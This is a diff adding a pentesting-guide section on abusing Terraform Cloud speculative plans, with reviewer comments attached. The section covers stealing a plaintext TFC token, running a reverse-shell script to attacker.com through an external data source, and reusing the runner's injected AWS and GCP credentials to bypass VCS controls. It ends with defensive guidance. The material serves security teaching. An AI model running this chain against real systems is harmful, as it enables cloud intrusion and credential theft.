diff --git a/src/pentesting-ci-cd/terraform-security.md b/src/pentesting-ci-cd/terraform-security.md index c1b4c6a67f..76b446bd89 100644 --- a/src/pentesting-ci-cd/terraform-security.md +++ b/src/pentesting-ci-cd/terraform-security.md 
@@ -217,6 +217,94 @@ data "external" "example" { } ``` +## Terraform Cloud speculative plan RCE and credential exfiltration + +This scenario abuses Terraform Cloud (TFC) runners during speculative plans to pivot into the target cloud account. + +- Preconditions: + - Steal a Terraform Cloud token from a developer machine. The CLI stores tokens in plaintext at `~/.terraform.d/credentials.tfrc.json`. + - The token must have access to the target organization/workspace and at least the `plan` permission. VCS-backed workspaces block `apply` from CLI, but still allow speculative plans. + +- Discover workspace and VCS settings via the TFC API: + +```bash +export TF_TOKEN= +curl -s -H "Authorization: Bearer $TF_TOKEN" \ + https://app.terraform.io/api/v2/organizations//workspaces/ | jq +``` + +- Trigger code execution during a speculative plan using the external data source and the Terraform Cloud "cloud" block to target the VCS-backed workspace: + +```hcl +terraform { + cloud { + organization = "acmecorp" + workspaces { name = "gcp-infra-prod" } + } +} + +data "external" "exec" { + program = ["bash", "./rsync.sh"] +} +``` + +Example rsync.sh to obtain a reverse shell on the TFC runner: + +```bash +#!/usr/bin/env bash +bash -c 'exec bash -i >& /dev/tcp/attacker.com/19863 0>&1' +``` + +Run a speculative plan to execute the program on the ephemeral runner: + +```bash +terraform init +terraform plan +``` + +- Enumerate and exfiltrate injected cloud credentials from the runner. 
During runs, TFC injects provider credentials via files and environment variables: + +```bash +env | grep -i gcp || true +env | grep -i aws || true +``` + +Expected files on the runner working directory: +- GCP: + - `tfc-google-application-credentials` (Workload Identity Federation JSON config) + - `tfc-gcp-token` (short-lived GCP access token) +- AWS: + - `tfc-aws-shared-config` (web identity/OIDC role assumption config) + - `tfc-aws-token` (short-lived token; some orgs may use static keys) + +- Use the short-lived credentials out-of-band to bypass VCS gates: + +GCP (gcloud): + +```bash +export GOOGLE_APPLICATION_CREDENTIALS=./tfc-google-application-credentials +gcloud auth login --cred-file="$GOOGLE_APPLICATION_CREDENTIALS" +gcloud config set project +``` + +AWS (AWS CLI): + +```bash +export AWS_CONFIG_FILE=./tfc-aws-shared-config +export AWS_PROFILE=default +aws sts get-caller-identity +``` + +With these creds, attackers can create/modify/destroy resources directly using native CLIs, sidestepping PR-based workflows that block `apply` via VCS. + +- Defensive guidance: + - Apply least privilege to TFC users/teams and tokens. Audit memberships and avoid oversized owners. + - Restrict `plan` permission on sensitive VCS-backed workspaces where feasible. + - Enforce provider/data source allowlists with Sentinel policies to block `data "external"` or unknown providers. See HashiCorp guidance on provider filtering. + - Prefer OIDC/WIF over static cloud credentials; treat runners as sensitive. Monitor speculative plan runs and unexpected egress. + - Detect exfiltration of `tfc-*` credential artifacts and alert on suspicious `external` program usage during plans. + + ## Automatic Audit Tools ### [**Snyk Infrastructure as Code (IaC)**](https://snyk.io/product/infrastructure-as-code-security/) 
@@ -322,8 +410,13 @@ brew install terrascan - [https://developer.hashicorp.com/terraform/intro](https://developer.hashicorp.com/terraform/intro) - [https://blog.plerion.com/hacking-terraform-state-privilege-escalation/](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) - [https://github.com/offensive-actions/terraform-provider-statefile-rce](https://github.com/offensive-actions/terraform-provider-statefile-rce) +- [Terraform Cloud token abuse turns speculative plan into remote code execution](https://www.pentestpartners.com/security-blog/terraform-token-abuse-speculative-plan/) +- [Terraform Cloud permissions](https://developer.hashicorp.com/terraform/cloud-docs/users-teams-organizations/permissions) +- [Terraform Cloud API – Show workspace](https://developer.hashicorp.com/terraform/cloud-docs/api-docs/workspaces#show-workspace) +- [AWS provider configuration](https://registry.terraform.io/providers/hashicorp/aws/latest/docs#provider-configuration) +- [AWS CLI – OIDC role assumption](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-role.html#cli-configure-role-oidc) +- [GCP provider – Using Terraform Cloud](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference.html#using-terraform-cloud) +- [Terraform – Sensitive variables](https://developer.hashicorp.com/terraform/tutorials/configuration-language/sensitive-variables) +- [Snyk Labs – Gitflops: dangers of Terraform automation platforms](https://labs.snyk.io/resources/gitflops-dangers-of-terraform-automation-platforms/) {{#include ../banners/hacktricks-training.md}} - - -
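Review bot: In the new "Terraform Cloud speculative plan RCE" section the placeholder values are missing from three commands: `export TF_TOKEN=` has no value, the API URL reads `organizations//workspaces/` with nothing between the slashes, and `gcloud config set project` has no project argument. This looks like angle-bracket placeholders (`<ORG>`, `<WORKSPACE>`, `<PROJECT_ID>`) that the markdown renderer swallowed; put them inside backticks or escape them so the commands are readable as written. The "Expected files on the runner working directory" list (`tfc-google-application-credentials`, `tfc-gcp-token`, `tfc-aws-shared-config`, `tfc-aws-token`) is stated without a citation; point it at whichever of the newly added references documents those file names so readers can verify it. The defensive guidance should also cover the starting point of the chain it describes: the plaintext token in `~/.terraform.d/credentials.tfrc.json`, for example by recommending short-lived or regularly rotated tokens and alerting on reads of that file, since the bullets as written only address permissions on the TFC side and the runner.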
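Review bot: The References hunk mixes two link styles: the three pre-existing entries use the bare URL as the link text (`[https://...](https://...)`), while all eight new entries use descriptive titles. Pick one convention for the list; the descriptive form reads better, so converting the three old entries would be the smaller change. Removing the trailing blank lines after the `{{#include ../banners/hacktricks-training.md}}` line is fine.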